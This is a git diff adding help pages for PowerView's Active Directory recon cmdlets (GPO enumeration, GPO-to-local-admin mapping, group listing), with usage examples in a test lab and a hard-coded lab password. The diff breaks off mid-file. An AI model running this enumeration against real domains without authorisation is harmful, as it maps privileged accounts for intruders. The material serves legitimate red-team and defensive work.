+Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ForeignUser + +Custom PSObject with translated user property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainGPO.md b/docs/Recon/Get-DomainGPO.md new file mode 100755 index 0000000..9d0a468 --- /dev/null +++ b/docs/Recon/Get-DomainGPO.md @@ -0,0 +1,354 @@ +# Get-DomainGPO + +## SYNOPSIS +Return all GPOs or specific GPO objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainComputer, Get-DomainUser, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainObject, Convert-LDAPProperty + +## SYNTAX + +### None (Default) +``` +Get-DomainGPO [[-Identity] ] [-Domain ] [-LDAPFilter ] [-Properties ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] [-Credential ] + [-Raw] +``` + +### ComputerIdentity +``` +Get-DomainGPO [[-Identity] ] [-ComputerIdentity ] [-Domain ] [-LDAPFilter ] + [-Properties ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] + [-Credential ] [-Raw] +``` + +### UserIdentity +``` +Get-DomainGPO [[-Identity] ] [-UserIdentity ] [-Domain ] [-LDAPFilter ] + [-Properties ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] + [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties samaccountname,usnchanged,...". +By default, all GPO objects for +the current domain are returned. +To enumerate all GPOs that are applied to +a particular machine, use -ComputerName X. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainGPO -Domain testlab.local +``` + +Return all GPOs for the testlab.local domain + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainGPO -ComputerName windows1.testlab.local +``` + +Returns all GPOs applied windows1.testlab.local + +### -------------------------- EXAMPLE 3 -------------------------- +``` +"{F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO +``` + +Return the GPOs with the name of "{F260B76D-55C8-46C5-BEF1-9016DD98E272}" and the display +name of "Test GPO" + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon +``` + +### -------------------------- EXAMPLE 5 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPO -Credential $Cred + +## PARAMETERS + +### -Identity +A display name (e.g. +'Test GPO'), DistinguishedName (e.g. +'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'), +GUID (e.g. +'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. +'{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ComputerIdentity +Return all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.). + +```yaml +Type: String +Parameter Sets: ComputerIdentity +Aliases: ComputerName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserIdentity +Return all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.). + +```yaml +Type: String +Parameter Sets: UserIdentity +Aliases: UserName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.GPO + +Custom PSObject with translated GPO property fields. + +PowerView.GPO.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md b/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md new file mode 100755 index 0000000..4e5015b --- /dev/null +++ b/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md @@ -0,0 +1,263 @@ +# Get-DomainGPOComputerLocalGroupMapping + +## SYNOPSIS +Takes a computer (or GPO) object and determines what users/groups are in the specified +local group for the machine through GPO correlation. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainGPOLocalGroup + +## SYNTAX + +### ComputerIdentity (Default) +``` +Get-DomainGPOComputerLocalGroupMapping [-ComputerIdentity] [-LocalGroup ] [-Domain ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +### OUIdentity +``` +Get-DomainGPOComputerLocalGroupMapping -OUIdentity [-LocalGroup ] [-Domain ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +This function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups +are in the specified local group for a target machine through GPO correlation. + +If a -ComputerIdentity is specified, retrieve the complete computer object, attempt to +determine the OU the computer is a part of. +Then resolve the computer's site name with +Get-NetComputerSiteName and retrieve all sites object Get-DomainSite. +For those results, attempt to +enumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup. +For +each resulting GPO group, resolve the resulting user/group name to a full AD object and +return the results. +This will return the domain objects that are members of the specified +-LocalGroup for the given computer. + +Otherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and +localgroup specifications. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local +``` + +Finds users who have local admin rights over WINDOWS3 through GPO correlation. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP +``` + +Finds users who have RDP rights over WINDOWS4 through GPO correlation. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local + +## PARAMETERS + +### -ComputerIdentity +A SamAccountName (e.g. +WINDOWS10$), DistinguishedName (e.g. +CN=WINDOWS10,CN=Computers,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. +4f16b6bc-7010-4cbf-b628-f3cfe20f6994), +or a dns host name (e.g. +windows10.testlab.local) for the computer to identity GPO local group mappings for. + +```yaml +Type: String +Parameter Sets: ComputerIdentity +Aliases: ComputerName, Computer, DistinguishedName, SamAccountName, Name + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -OUIdentity +An OU name (e.g. +TestOU), DistinguishedName (e.g. +OU=TestOU,DC=testlab,DC=local), or +GUID (e.g. +8a9ba22a-8977-47e6-84ce-8c26af4e1e6a) for the OU to identity GPO local group mappings for. + +```yaml +Type: String +Parameter Sets: OUIdentity +Aliases: OU + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LocalGroup +The local group to check access against. +Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555), +or a custom local SID. +Defaults to local 'Administrators'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to enumerate GPOs for, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +{{Fill SearchBase Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.GGPOComputerLocalGroupMember + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainGPOLocalGroup.md b/docs/Recon/Get-DomainGPOLocalGroup.md new file mode 100755 index 0000000..e61fb82 --- /dev/null +++ b/docs/Recon/Get-DomainGPOLocalGroup.md @@ -0,0 +1,259 @@ +# Get-DomainGPOLocalGroup + +## SYNOPSIS +Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' +or Group Policy preferences. +Also return their user membership mappings, if they exist. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: Get-DomainGPO, Get-GptTmpl, Get-GroupsXML, ConvertTo-SID, ConvertFrom-SID + +## SYNTAX + +``` +Get-DomainGPOLocalGroup [[-Identity] ] [-ResolveMembersToSIDs] [-Domain ] + [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +First enumerates all GPOs in the current/target domain using Get-DomainGPO with passed +arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or +group membership is set through Group Policy Preferences groups.xml files. +For any +GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership' +section data is processed if present. +Any found Groups.xml files are parsed with +Get-GroupsXML and those memberships are returned as well. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainGPOLocalGroup +``` + +Returns all local groups set by GPO along with their members and memberof. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainGPOLocalGroup -ResolveMembersToSIDs +``` + +Returns all local groups set by GPO along with their members and memberof, +and resolve any members to their domain SIDs. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup +``` + +Return any GPO-set groups for the GPO with the given name/GUID. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-DomainGPOLocalGroup 'Desktops' +``` + +Return any GPO-set groups for the GPO with the given display name. + +### -------------------------- EXAMPLE 5 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPOLocalGroup -Credential $Cred + +## PARAMETERS + +### -Identity +A display name (e.g. +'Test GPO'), DistinguishedName (e.g. +'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'), +GUID (e.g. +'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. +'{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ResolveMembersToSIDs +Switch. +Indicates that any member names should be resolved to their domain SIDs. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.GPOGroup + +## NOTES + +## RELATED LINKS + +[https://morgansimonsenblog.azurewebsites.net/tag/groups/](https://morgansimonsenblog.azurewebsites.net/tag/groups/) + diff --git a/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md b/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md new file mode 100755 index 0000000..d42a4be --- /dev/null +++ b/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md @@ -0,0 +1,258 @@ +# Get-DomainGPOUserLocalGroupMapping + +## SYNOPSIS +Enumerates the machines where a specific domain user/group is a member of a specific +local group, all through GPO correlation. +If no user/group is specified, all +discoverable mappings are returned. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: Get-DomainGPOLocalGroup, Get-DomainObject, Get-DomainComputer, Get-DomainOU, Get-DomainSite, Get-DomainGroup + +## SYNTAX + +``` +Get-DomainGPOUserLocalGroupMapping [[-Identity] ] [-LocalGroup ] [-Domain ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +Takes a user/group name and optional domain, and determines the computers in the domain +the user/group has local admin (or RDP) rights to. + +It does this by: + 1. +resolving the user/group to its proper SID + 2. +enumerating all groups the user/group is a current part of + and extracting all target SIDs to build a target SID list + 3. +pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling + Get-DomainGPOLocalGroup + 4. +matching the target SID list to the queried GPO SID list + to enumerate all GPO the user is effectively applied with + 5. +enumerating all OUs and sites and applicable GPO GUIs are + applied to through gplink enumerating + 6. +querying for all computers under the given OUs or sites + +If no user/group is specified, all user/group -\> machine mappings discovered through +GPO relationships are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-GPOLocation +``` + +Find all user/group -\> machine relationships where the user/group is a member +of the local administrators group on target machines. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-GPOLocation -UserName dfm -Domain dev.testlab.local +``` + +Find all computers that dfm user has local administrator rights to in +the dev.testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Find-GPOLocation -UserName dfm -Domain dev.testlab.local +``` + +Find all computers that dfm user has local administrator rights to in +the dev.testlab.local domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPOUserLocalGroupMapping -Credential $Cred + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the user/group to identity GPO local group mappings for. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -LocalGroup +The local group to check access against. +Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555), +or a custom local SID. +Defaults to local 'Administrators'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to enumerate GPOs for, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +{{Fill SearchBase Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.GPOLocalGroupMapping + +A custom PSObject containing any target identity information and what local +group memberships they're a part of through GPO correlation. + +## NOTES + +## RELATED LINKS + +[http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/](http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/) + diff --git a/docs/Recon/Get-DomainGroup.md b/docs/Recon/Get-DomainGroup.md new file mode 100755 index 0000000..faaa082 --- /dev/null +++ b/docs/Recon/Get-DomainGroup.md @@ -0,0 +1,397 @@ +# Get-DomainGroup + +## SYNOPSIS +Return all groups or specific group objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainObject, Convert-ADName, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainGroup [[-Identity] ] [-MemberIdentity ] [-AdminCount] [-Domain ] + [-LDAPFilter ] [-Properties ] [-SearchBase ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] + [-Tombstone] [-FindOne] [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties samaccountname,usnchanged,...". +By default, all group objects for +the current domain are returned. +To return the groups a specific user/group is +a part of, use -MemberIdentity X to execute token groups enumeration. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainGroup | select samaccountname +``` + +samaccountname +-------------- +WinRMRemoteWMIUsers__ +Administrators +Users +Guests +Print Operators +Backup Operators +... + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainGroup *admin* | select distinguishedname +``` + +distinguishedname +----------------- +CN=Administrators,CN=Builtin,DC=testlab,DC=local +CN=Hyper-V Administrators,CN=Builtin,DC=testlab,DC=local +CN=Schema Admins,CN=Users,DC=testlab,DC=local +CN=Enterprise Admins,CN=Users,DC=testlab,DC=local +CN=Domain Admins,CN=Users,DC=testlab,DC=local +CN=DnsAdmins,CN=Users,DC=testlab,DC=local +CN=Server Admins,CN=Users,DC=testlab,DC=local +CN=Desktop Admins,CN=Users,DC=testlab,DC=local + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl +``` + +samaccountname +-------------- +Server Admins + +### -------------------------- EXAMPLE 4 -------------------------- +``` +'CN=Desktop Admins,CN=Users,DC=testlab,DC=local' | Get-DomainGroup -Server primary.testlab.local -Verbose +``` + +VERBOSE: Get-DomainSearcher search string: LDAP://DC=testlab,DC=local +VERBOSE: Get-DomainGroup filter string: (&(objectCategory=group)(|(distinguishedname=CN=DesktopAdmins,CN=Users,DC=testlab,DC=local))) + +usncreated : 13245 +grouptype : -2147483646 +samaccounttype : 268435456 +samaccountname : Desktop Admins +whenchanged : 8/10/2016 12:30:30 AM +objectsid : S-1-5-21-890171859-3433809279-3366196753-1118 +objectclass : {top, group} +cn : Desktop Admins +usnchanged : 13255 +dscorepropagationdata : 1/1/1601 12:00:00 AM +name : Desktop Admins +distinguishedname : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +member : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +whencreated : 8/10/2016 12:29:43 AM +instancetype : 4 +objectguid : f37903ed-b333-49f4-abaa-46c65e9cca71 +objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=testlab,DC=local + +### -------------------------- EXAMPLE 5 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGroup -Credential $Cred + +### -------------------------- EXAMPLE 6 -------------------------- +``` +Get-Domain | Select-Object -Expand name +``` + +testlab.local + +'DEV\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainGroup\] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins' +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainGroup\] filter string: (&(objectCategory=group)(|(samAccountName=Domain Admins))) + +distinguishedname +----------------- +CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +Group1), DistinguishedName (e.g. +CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to query for. +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -MemberIdentity +A SamAccountName (e.g. +Group1), DistinguishedName (e.g. +CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the user/group member to query for group membership. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: UserName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AdminCount +Switch. +Return users with '(adminCount=1)' (meaning are/were privileged). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### 